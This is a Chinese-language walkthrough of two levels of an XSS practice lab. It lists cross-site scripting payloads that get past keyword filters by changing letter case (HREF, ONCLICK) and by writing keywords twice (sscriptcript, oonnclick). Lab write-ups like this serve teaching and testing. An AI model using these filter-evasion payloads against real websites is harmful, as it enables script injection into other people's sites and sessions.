一、level6-----大小写绕过
1、测试分析
测试了之前用过的payload,发现都不行,并且level4使用的Java伪协议也不行,可以得出<>、script、onclick都被过滤
2、构造payload
因为href被过滤,可以试一下大写HREF
初试payload:
"><a HREF=javascript:alert(1)>xss<a/>//
既然可以大写绕过,那payload就多了,只要能够将value或者input标签闭合并且大写就都可以
"><a HREF=javascript:alert(1)>超链接,并弹窗</a>//
"ONCLICK=alert(1)//
"ONCLICK="alert(1)
"><SCRIPT>alert(1)</SCRIPT>//
二、level7-----双写绕过
1、测试分析
测试过的额payload有:
"οnclick=alert(1)//
"οnclick="alert(1)
"><script>alert(1)</script>//
"><a href=javascript:alert(1)>超链接,并弹窗</a>//
传入payload后,查看源码发现,过滤的有
on
script
href
大小写
2、构造payload
可以采用双写绕过,payload:
"oonnclick=alert(1)//
"oonnclick="alert(1)
"><sscriptcript>alert(1)</sscriptcript>//
"><a hhrefref=javasscriptcript:alert(1)>超链接,并弹窗</a>//
总结:
1、绕过方法还可以使用大写绕过
2、将input标签或者value其中一个闭合就可以尝试插入xss
3、双写可以绕过过滤